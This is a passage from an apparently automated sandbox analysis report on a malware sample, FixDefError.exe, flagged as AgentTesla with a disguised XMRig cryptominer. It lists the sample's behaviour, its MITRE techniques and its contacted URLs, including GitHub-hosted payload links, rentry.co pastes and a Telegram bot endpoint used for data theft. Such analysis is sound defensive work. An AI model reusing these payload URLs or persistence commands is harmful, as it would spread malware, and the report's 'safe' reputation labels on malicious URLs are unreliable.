      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\ProgramData\RuntimeBrokerData\RegSvc.exe VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\FixDefError.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies power options to not sleep / hibernate
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
      Modifies the hosts file
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\SysWOW64\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
      Source: svchost.exe, 00000047.00000002.516627565.0000029D68640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: svchost.exe, 00000047.00000002.516940028.0000029D68702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      File and Directory Permissions Modification      		OS Credential Dumping1
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Web Service      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Command and Scripting Interpreter      		1
      Windows Service      		1
      Windows Service      		11
      Disable or Modify Tools      		LSASS Memory13
      System Information Discovery      		Remote Desktop Protocol1
      Clipboard Data      		Exfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		11
      Process Injection      		1
      Deobfuscate/Decode Files or Information      		Security Account Manager231
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
      Encrypted Channel      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      PowerShell      		Logon Script (Mac)1
      Scheduled Task/Job      		2
      Obfuscated Files or Information      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
      Software Packing      		LSA Secrets131
      Virtualization/Sandbox Evasion      		SSHKeyloggingData Transfer Size Limits13
      Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Timestomp      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      Masquerading      		Proc Filesystem1
      System Network Configuration Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)11
      Process Injection      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 829697 Sample: FixDefError.exe Startdate: 19/03/2023 Architecture: WINDOWS Score: 100 67 www.google.com 2->67 69 rentry.co 2->69 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 8 other signatures 2->87 10 FixDefError.exe 5 2->10         started        13 RegSvc.exe 2->13         started        17 svchost.exe 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 63 C:\Users\user\AppData\...\ProgramStarter.exe, PE32 10->63 dropped 65 C:\Users\user\AppData\...\FixDefError.exe.log, ASCII 10->65 dropped 21 ProgramStarter.exe 15 27 10->21         started        77 rentry.co 13->77 105 Machine Learning detection for dropped file 13->105 107 Changes security center settings (notifications, updates, antivirus, firewall) 17->107 79 192.168.2.1 unknown unknown 19->79 file6 signatures7 process8 dnsIp9 71 api4.ipify.org 104.237.62.211, 443, 49686 WEBNXUS United States 21->71 73 api.telegram.org 149.154.167.220, 443, 49687 TELEGRAMRU United Kingdom 21->73 75 5 other IPs or domains 21->75 55 C:\ProgramData\RuntimeBrokerData\svhost.exe, PE32+ 21->55 dropped 57 C:\ProgramData\...\WinRing0x64.sys, PE32+ 21->57 dropped 59 C:\ProgramData\...\RuntimeBroker.exe, PE32 21->59 dropped 61 2 other malicious files 21->61 dropped 89 Antivirus detection for dropped file 21->89 91 Multi AV Scanner detection for dropped file 21->91 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->93 95 4 other signatures 21->95 26 cmd.exe 1 21->26         started        29 cmd.exe 21->29         started        31 cmd.exe 1 21->31         started        33 14 other processes 21->33 file10 signatures11 process12 signatures13 97 Encrypted powershell cmdline option found 26->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 26->99 101 Uses powercfg.exe to modify the power settings 26->101 35 powershell.exe 22 26->35         started        37 conhost.exe 26->37         started        103 Modifies power options to not sleep / hibernate 29->103 39 powercfg.exe 29->39         started        49 6 other processes 29->49 41 conhost.exe 31->41         started        43 schtasks.exe 1 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 33->47         started        51 26 other processes 33->51 process14 process15 53 Conhost.exe 39->53         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FixDefError.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      FixDefError.exe39%VirustotalBrowse
      FixDefError.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\ProgramData\RuntimeBrokerData\svhost.exe100%AviraHEUR/AGEN.1203240
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe100%AviraHEUR/AGEN.1236409
      C:\ProgramData\RuntimeBrokerData\RegSvc.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\svhost.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe100%Joe Sandbox ML
      C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
      C:\ProgramData\RuntimeBrokerData\WinRing0x64.sys5%ReversingLabs
      C:\ProgramData\RuntimeBrokerData\svhost.exe81%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
      C:\Users\user\AppData\Local\Temp\ProgramStarter.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.ProgramStarter.exe.750000.0.unpack100%AviraHEUR/AGEN.1236409Download File

      Domains

      SourceDetectionScannerLabelLink
      rentry.co0%VirustotalBrowse
      raw.githubusercontent.com1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.fontbureau.comgrita0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.galapagosdesign.com/0%URL Reputationsafe
      https://render.githubusercontent.com0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://www.founder.com.cn/cnTF0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://www.fontbureau.comicta0%URL Reputationsafe
      https://xmrig.com/wizard0%URL Reputationsafe
      https://%s.xboxlive.com0%URL Reputationsafe
      http://www.carterandcone.comn0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      https://dynamic.t0%URL Reputationsafe
      https://xmrig.com/benchmark/%s0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.carterandcone.comams0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      https://api.telegram.org40%URL Reputationsafe
      https://github.com40%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.de0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.agfamonotype.0%URL Reputationsafe
      https://xmrig.com/wizard%s0%URL Reputationsafe
      http://www.urwpp.deF0%URL Reputationsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe0%Avira URL Cloudsafe
      http://www.fontbureau.comueom80%Avira URL Cloudsafe
      http://www.urwpp.de-0%Avira URL Cloudsafe
      https://api.ipify.org8:0%Avira URL Cloudsafe
      https://rentry.co0%Avira URL Cloudsafe
      https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxN0%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys0%Avira URL Cloudsafe
      https://rentry.co0%VirustotalBrowse
      https://raw.githubusercontent.com40%Avira URL Cloudsafe
      https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe1%VirustotalBrowse
      http://www.fontbureau.comgr0%Avira URL Cloudsafe
      https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw0%Avira URL Cloudsafe
      https://raw.githubusercontent.com0%Avira URL Cloudsafe
      http://raw.githubusercontent.com0%Avira URL Cloudsafe
      http://www.fontbureau.com-s0%Avira URL Cloudsafe
      http://www.tiro.comlic;0%Avira URL Cloudsafe
      http://www.fontbureau.com773.0%Avira URL Cloudsafe
      http://www.sandoll.co.kreV0%Avira URL Cloudsafe
      http://www.tiro.comu0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      api4.ipify.org
      		104.237.62.211
      		truefalse
        		high
        github.com
        		140.82.121.3
        		truefalse
          		high
          rentry.co
          		198.251.88.130
          		truefalseunknown
          raw.githubusercontent.com
          		185.199.111.133
          		truefalseunknown
          www.google.com
          		142.251.209.36
          		truefalse
            		high
            api.telegram.org
            		149.154.167.220
            		truefalse
              		high
              api.ipify.org
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exefalse
                  		high
                  https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exefalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sysfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/rawfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.ipify.org/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/botProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.328304357.000000000448D000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000043.00000003.316802969.000001CFFD84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.323019726.000001CFFD853000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.255813381.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256429810.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.sajatypeworks.comFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000043.00000003.318327858.000001CFFD84A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.comueom8FixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cTheFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comgritaProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.ipify.org8:ProgramStarter.exe, 00000001.00000002.303854909.0000000002C69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.urwpp.de-FixDefError.exe, 00000000.00000003.255725744.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.255747513.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.urwpp.deDPleaseFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProgramStarter.exe, 00000001.00000002.303854909.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, RegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.bingmapsportal.comsvchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://rentry.coRegSvc.exe, 00000038.00000002.520725244.0000000002441000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.galapagosdesign.com/ProgramStarter.exe, 00000001.00000003.257427275.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://render.githubusercontent.comProgramStarter.exe, 00000001.00000002.303854909.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000043.00000003.318697799.000001CFFD845000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cnTFFixDefError.exe, 00000000.00000003.252281963.0000000008682000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://go.micropowershell.exe, 00000004.00000003.465541531.000000000544F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://rentry.co/poxonjnntyfzjniyneuqfcjhmytxhlxNRegSvc.exe, 00000038.00000002.520725244.0000000002774000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comictaFixDefError.exe, 00000000.00000002.285870144.00000000011E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://raw.githubusercontent.com4ProgramStarter.exe, 00000001.00000002.303854909.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000043.00000002.322806617.000001CFFD813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.322972457.000001CFFD83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://xmrig.com/wizardsvhost.exe.1.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://%s.xboxlive.comsvchost.exe, 00000036.00000002.516467984.000001EA2043D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000043.00000003.316689440.000001CFFD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000043.00000003.294061015.000001CFFD832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000003.457162735.0000000007736000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.450221105.0000000007721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comnFixDefError.exe, 00000000.00000003.253064803.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253083653.00000000086A1000.00000004.00000020.00020000.00000000.sdmp, FixDefError.exe, 00000000.00000003.253039948.00000000086A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlFixDefError.exe, 00000000.00000002.316772970.0000000009902000.00000004.00000800.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256241986.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256307873.0000000007F11000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256114080.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000002.351643184.0000000009E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000043.00000002.323043850.000001CFFD85D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.comgrProgramStarter.exe, 00000001.00000003.256839825.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256999864.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256680586.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256766005.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.257049259.0000000007F0E000.00000004.00000020.00020000.00000000.sdmp, ProgramStarter.exe, 00000001.00000003.256528617.0000000007F0E000.00000004.00000020.00020000.00000000.sdmpfalse
